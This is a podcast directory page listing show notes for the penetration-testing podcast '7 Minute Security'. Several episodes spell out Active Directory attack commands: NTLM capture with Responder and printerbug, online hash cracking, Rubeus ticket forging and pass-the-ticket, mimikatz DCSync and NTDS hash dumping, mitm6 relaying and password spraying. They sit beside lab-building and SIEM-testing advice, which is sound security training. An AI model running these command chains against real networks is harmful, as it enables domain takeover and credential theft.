TopPodcast.com
Menu
  • Home
  • Top Charts
  • Top Networks
  • Top Apps
  • Top Independents
  • Top Podfluencers
  • Top Picks
    • Top Business Podcasts
    • Top True Crime Podcasts
    • Top Finance Podcasts
    • Top Comedy Podcasts
    • Top Music Podcasts
    • Top Womens Podcasts
    • Top Kids Podcasts
    • Top Sports Podcasts
    • Top News Podcasts
    • Top Tech Podcasts
    • Top Crypto Podcasts
    • Top Entrepreneurial Podcasts
    • Top Fantasy Sports Podcasts
    • Top Political Podcasts
    • Top Science Podcasts
    • Top Self Help Podcasts
    • Top Sports Betting Podcasts
    • Top Stocks Podcasts
  • Podcast News
  • About Us
  • Podcast Advertising
  • Contact
Not in our directory?
Add Show Here
Podcast Equipment
Center

toppodcastlogoOur TOPPODCAST Picks

  • Comedy
  • Crypto
  • Sports
  • News
  • Politics
  • True Crime
  • Business
  • Finance

Follow Us

toppodcastlogoStay Connected

    View Top 200 Chart
    Back to Rankings Page
    News

    7 Minute Security

    7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

    Advertise

    Copyright: © Brian Johnson

    • Apple Podcasts
    • Google Play
    • Spotify

    Latest Episodes:
    7MS #560: 7MOOCH - Dolphin Rides Are Done Dude Feb 17, 2023
    Show notes

    Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"


    7MS: #559: Tales of Pentest Pwnage - Part 46 Feb 10, 2023
    Show notes

    Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

    Change the Responder.conf file like so:

    ; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788

    Run Responder with --disable-ess flag

    sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

    Use printerbug to coax authentication from a domain controller:

    sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

    Convert hash to make it easier to crack!

    sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

    Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!

    Now you can do a Rubeus asktgt with the DC hash:

    rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

    Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

    rubeus.exe ptt /ticket:TICKET GOES HERE

    Use mimikatz to dump all hashes!

    mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

    7MS #558: How to Build a Vulnerable Pentest Lab - Part 2 Feb 07, 2023
    Show notes

    Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going:

    • Use Youzer to import a bunch of bogus users into your Active Directory:
    sudo python ./youzer.py --generate --generate_length 20 --ou "ou=Contractors,dc=brifly,dc=us" --domain brifly.us --users 1000 --output lusers.csv
    • Make a Kerberoastable user:
    New-AdUser -Name "Kerba Roastable" -GivenName "Kerba" -Surname "Roastable" -SamAccountName Kerba -Description "ROASTED!" -Path "OU=Contractors,DC=brifly,DC=us" -AccountPassword (ConvertTo-SecureString "Password1" -AsPlainText -force) -passThru -PasswordNeverExpires $true enable-adaccount Kerba setspn -a IIS_SITE/brifly-dc01.brily.us:77777 briflyus\kerba

    7MS #557: Better Passive Network Visibility Using Teleseer Jan 27, 2023
    Show notes

    Today we're talking about Teleseer, which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your network and - from a pentester's perspective - delicious vulnerabilities that may lie within!


    7MS #556: How to Build a Vulnerable Pentest Lab Jan 20, 2023
    Show notes

    Today's episode is brought to us by our friends at Blumira!

    Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically:

    • Spinning up a domain controller with a few lines of PowerShell
    • Installing Active Directory Domain Services
    • Setting up an intentionally cruddy password policy
    • Baking in the MS14-025 vulnerability

    P.S. if you're looking for a more automated/push-button solution to get up and going with a lab to play in, check out some of these options:

    https://github.com/Orange-Cyberdefense/GOAD https://automatedlab.org/en/latest/ https://github.com/microsoft/MSLab https://github.com/davidprowe/BadBlood https://github.com/cliffe/secgen https://github.com/WazeHell/vulnerable-AD


    7MS #555: Light Pentest eBook 1.1 Release Jan 13, 2023
    Show notes

    Today we're releasing version 1.1 of our Light Pentest eBook. Changes discussed in today's episode (and shown live in the accompanying YouTube video) include:

    • Some typos and bug fixes
    • A new section on finding systems with unconstrained delegation and exploiting them
    • A new section on finding easily pwnable passwords via password spraying
    • A new section relaying credentials with MITM6 (be careful using some of its options - read this
    • New ways (and some words of warning) to dump hashes from Active Directory

    7MS #554: Simple Ways to Test Your SIEM Jan 06, 2023
    Show notes

    Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:

    Port scanning nmap 10.0.7.0/24 - basic nmap scan massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports!

    Password spraying Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt

    Kerberoasting and ASREPRoasting rubeus.exe kerberoast /simple rubeus asreproast /nowrap

    Key group membership changes net group "GROUP NAME" user-to-add-to-a-group /add

    Dump Active Directory hashes cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q

    SMB share hunting Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares


    7MS #553: The Artificial Intelligence Throat Burn Episode Dec 30, 2022
    Show notes

    Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT appointment, check out today's episode. Otherwise, we'll see you next week when our regularly scheduled security content continues in 2023.

    Merry belated Christmas, happy holidays and happiest of new year to you and yours!


    7MS #552: Tales of Pentest Pwnage - Part 45 Dec 24, 2022
    Show notes

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's tale of pentest pwnage covers some of the following attacks/tools:

    • Teleseer for packet capture visualizations on steroids!
    • Copernic Desktop Search
    • Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it
    • I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack
    • Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)

    7MS #551: Interview with Matt Warner of Blumira Dec 16, 2022
    Show notes

    Today we welcome our pal Matthew Warner (CTO and co-founder of Blumira) back to the show for a third time (his first appearance was #507 and second was #529).

    I complained to Matt about how so many SIEM/SOC solutions don't catch early warning signs of evil things lurking in customer networks. Specifically, I whined about 7 specific, oft-missed attacks like port scanning, Kerberoasting, ASREPRoasting, password spraying and more. (Shameless self-promotion opportunity: I will be discussing these attacks on an upcoming livestream on December 29).

    Matt dives into each of these attacks and shares some fantastic insights into what they look like from a defensive perspective, and also offers practical strategies and tools for detecting them!

    Note: during the discussion, Matt points out a lot of important Active Directory groups to keep an eye on from a membership point of view. Those groups include:

    • ASAAdmins
    • Account Operators
    • Administrators
    • Administrators
    • Backup Operators
    • Cert Publishers
    • Certificate Service DCOM
    • DHCP Administrators
    • Debugger Users
    • DnsAdmins
    • Domain Admins
    • Enterprise Admins
    • Enterprise Admins
    • Event Log Readers
    • ExchangeAdmins
    • Group Policy Creator Owners
    • Hyper-V Administrators
    • IIS_IUSRS
    • IT Compliance and Security Admins
    • Incoming Forest Trust Builders
    • MacAdmins
    • Network Configuration Operators
    • Schema Admins
    • Server Operators
    • ServerAdmins
    • SourceFireAdmins
    • WinRMRemoteWMIUsers
    • WorkstationAdmins
    • vCenterAdmins

    Previous 1 17 18 19 20 21 75 Next

    Related Podcasts

    Inside Strategic Coach: Connecting Entrepreneurs With What Really Matters

    1

    Inside Strategic Coach: Connecting Entrepreneurs With What Really Matters Business
    WSJ Your Money Briefing

    2

    WSJ Your Money Briefing Business
    FORTUNE Unfiltered with Aaron Task

    3

    FORTUNE Unfiltered with Aaron Task Business
    FORTUNE OnStage Presents: The Most Powerful Women

    4

    FORTUNE OnStage Presents: The Most Powerful Women Business
    Slate Money

    5

    Slate Money Business
    In The Dark – The New Yorker

    6

    In The Dark – The New Yorker Business News
    footer-logo

    Contact Us

    Toll Free: 844-670-7747

    Links

    • Home
    • Top Charts
    • Networks
    • Apps
    • Independents Podcasts
    • Podcast Advertising
    • Podcast News
    • Contact Us
    • About Us
    • Analytics & Insights

    Stay Connected

      Privacy, Terms of Use & Our Code of Ethics Protecting Content Creators Copyrights